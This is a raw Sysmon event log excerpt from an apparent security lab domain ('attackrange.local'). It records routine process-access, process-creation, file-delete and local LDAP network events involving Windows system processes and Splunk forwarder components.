12:25:25.836{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293037Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.836{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293036Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.836{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-02B5-6088-182A-00000000BB01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293035Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.836{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B5-6088-182A-00000000BB01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000293034Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.721{BEA10069-02B5-6088-182A-00000000BB01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293033Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.605{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293032Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.203{BEA10069-02B4-6088-172A-00000000BB01}53606572C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293031Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B4-6088-172A-00000000BB01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293030Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293029Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293028Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293027Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293026Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-02B4-6088-172A-00000000BB01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293025Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.050{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B4-6088-172A-00000000BB01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000293024Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.935{BEA10069-02B4-6088-172A-00000000BB01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000441470Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:25.251{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441469Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:25.251{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293052Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.953{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C339DD183F9C568B6A7F94E52AD53DE,SHA256=C542D15C630F81A3EE9A89199590FC9C6DDE6496BD2113D02A7EE74F739186AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441477Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:26.678{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C55CED3B496649C8F12A90864F3A8AF,SHA256=70F6E3114ADD792F21D1589E1E40F840BA97E14CD334E6D37557C125766AB889,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293051Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.628{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B6-6088-192A-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293050Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.626{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293049Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.626{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293048Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.626{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293047Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.626{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293046Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.626{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-02B6-6088-192A-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293045Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.625{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B6-6088-192A-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000293044Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:26.501{BEA10069-02B6-6088-192A-00000000BB01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000441476Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:23.249{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62428-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 354300x8000000000000000441475Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:23.249{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62428-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 10341000x8000000000000000441474Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:26.252{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441473Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:26.252{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 